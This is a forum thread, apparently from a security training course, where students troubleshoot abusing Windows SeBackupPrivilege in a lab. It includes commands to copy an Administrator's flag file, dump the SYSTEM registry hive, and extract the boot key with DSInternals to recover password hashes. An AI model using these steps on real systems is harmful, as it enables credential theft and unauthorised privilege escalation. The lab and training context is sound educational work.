Hi. The module writes about privilege escalation through SeBackupPrivilegeCmdLets.dll, which is imported with the command Import-Module .\SeBackupPrivilegeCmdLets.dll. But on the victim machine it replies:
+ "Import-Module : Could not load file or assembly
'file:///C:\Users\svc_backup\Downloads\Debug\SeBackupPrivilegeCmdLets.dll' or
one of its dependencies.
Operation is not supported. (Exception from HRESULT: 0x80131515)
+ At line:1 char:1
+ Import-Module .\SeBackupPrivilegeCmdLets.dll
+ CategoryInfo : NotSpecified: (:) [Import-Module], FileLoadException
+ FullyQualifiedErrorId : System.IO.FileLoadException,Microsoft.PowerShell.Commands.ImportModuleCommand"
I've rebuilt the project with .NET 4.8 but nothing changed. I also tried importing from an admin powershell -exec bypass. Am I missing something obvious?
Has anyone solved this section?
Hey, it's most likely because you were trying to write the file to a directory where you don't have permissions; I was doing the same thing. If you have done the other steps correctly you can use this:
Copy-FileSeBackupPrivilege 'C:\Users\Administrator\Desktop\SeBackupPrivilege\flag.txt' C:\Users\svc_backup\Desktop\Contract.txt
This will copy and rename the file to the desktop of svc_backup. Then navigate there and 'cat' or 'more' the file. You should be good from there.
How did you solve it???
Never mind, I found the DLLs inside the tools folder.
Anyone managed to resolve this module using DSInternals? Every time I try to get the bootkey I get an error
PS C:\temp> reg save hklm\system system.save
The operation completed successfully.
PS C:\temp> $key = Get-BootKey -SystemHiveFilePath C:\temp\system.save
Get-BootKey : Requested registry access is not allowed.
At line:1 char:8
+ $key = Get-BootKey -SystemHiveFilePath C:\temp\system.save
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : OpenError: (:) [Get-BootKey], SecurityException
+ FullyQualifiedErrorId : GetBootKey_OtherError,DSInternals.PowerShell.Commands.GetBootKeyCommand
I know I can recover the hashes using other techniques, just wanted to test DSInternals way.
I hit this too. I'm no expert, but having a look at the DSInternals code, I think it uses RegLoadKey from advapi. So the tool relies on loading the dumped hive into the registry of the host you are auditing from in order to read it. This could be a problem if you are just a Backup Operator, as there's no write access to HKEY_USERS, where it tries to load the thing?
It certainly works if you get a copy off to a host you are admin on…
Annoyingly, if you hit this issue the tool also removes your SeBackupPrivilege permission.